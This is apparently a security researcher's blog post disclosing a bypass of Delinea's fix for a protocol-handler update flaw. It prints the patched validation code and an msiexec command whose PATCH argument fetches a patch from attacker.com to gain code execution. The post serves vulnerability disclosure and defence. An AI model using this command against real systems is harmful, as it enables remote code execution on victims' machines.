David CashDelinea’s custom URL handler allows the software’s update process to be triggered, downloading and running an MSI from an arbitrary location. The software expects the update to be in the form of a zip archive with a particular file and folder structure, running an MSI via a command in an adjacent setup.bat file. Signature checks are performed on the MSI to prove legitimacy and the installation is abandoned if the checks are not passed.
We originally found a vulnerability in this process last year Delinea Protocol Handler - Remote Code Execution via Update Process (CVE-2024-12908), which you might want to read to refresh your memory. We thought we’d take a look at how the patch worked and see if we could bypass it.
Our previous exploit leveraged the TRANSFORMS argument to msiexec.exe to modify the MSI tables at runtime and achieve code execution. The exploit used a command similar to the following in the update archive’s setup.bat file:
msiexec /i msi\SSProtocolHandler.msi TRANSFORMS="delinea.mst"
Analysis of the patched version of the RDPWin.Bootstrapper.exe file triggered by the URL handler showed that an additional check for the word TRANSFORMS in the msiexec.exe command line had been implemented.
if (flag4)
{
text5 = Path.Combine(tempPath, Guid.NewGuid().ToString());
ZipFile.ExtractToDirectory(newVersionMsi, text5);
IEnumerable<string> enumerable = File.ReadLines(Path.Combine(text5, "SSProtocolHandler", "setup.bat"));
bool flag5 = false;
bool flag6 = false;
bool flag7 = false;
foreach (string text7 in enumerable)
{
if (!flag7)
{
flag7 = true;
text6 = text7;
}
flag5 |= (text7.IndexOf("TRANSFORMS", StringComparison.OrdinalIgnoreCase) != -1);
flag6 |= text7.Any((char c) => c > '\u007f');
}
if (string.IsNullOrWhiteSpace(text6) || !text6.StartsWith("msiexec /i msi\\SSProtocolHandler.msi", StringComparison.Ordinal) || text6.Contains("&") || flag5 || flag6)
{
Program.Log.Error("Invalid batch file command in downloaded update: " + text6);
IoC.Resolve<IMessageBox>().Show("The Secret Server Launcher failed to load.\n\nAuto-update is enabled, but the downloaded update batch file is invalid. You may be the victim of a phishing attack.", "Invalid Update Downloaded", MessageBoxButtons.OK, MessageBoxIcon.Hand);
return;
}
text8 = Path.Combine(text5, "SSProtocolHandler", "msi", "SSProtocolHandler.msi");
}
The interesting lines are isolated below - we see that boolean flags are set if the command in the setup.bat contains TRANSFORMS, but also if it contains any unicode character above u007f - combatting against the Worstfit style of attack. If either flag is set then the update process is abandoned.
flag5 |= (text7.IndexOf("TRANSFORMS", StringComparison.OrdinalIgnoreCase) != -1);
flag6 |= text7.Any((char c) => c > '\u007f');
Although this check is successful in preventing transforms from being added to the command line, msiexec.exe can also accept a PATCH argument that can reference a .msp file to apply a differential to the MSI installation - for example:
msiexec.exe /i installer.msi PATCH=patch.msp
A subtle difference between a transform and a patch is that signature checks can be performed against the MSP file. In this instance the Delinea protocol handler only validates the signature of the MSI itself, making it possible to supply a PATCH argument to modify the MSI at install time.
Msiexec.exe is able to retrieve a patch from a web server and does not require a specific file extension, meaning that the command in the setup.bat can be modified to be:
msiexec /i msi\SSProtocolHandler.msi PATCH=https://attacker.com/patch.txt
When included in the zip file downloaded by the URL handler, this command will download patch.txt and apply it to the SSProtocolHandler.msi file at runtime, giving code execution.
The video below shows the exploit in action, with the victim triggering the URL handler and being served a signed update alongside a bat file that specifies an msiexec command with a PATCH argument.
David Cash
Richard WarrenThe Delinea Protocol Handler suffers from a Remote Code Execution vulnerability in the sslauncher URL handler. This could be exploited by a malicious …
Read Article
Richard Warren
David CashIs Your Corporate VPN Client Providing Access to More Than Just Your Employees?
Read Article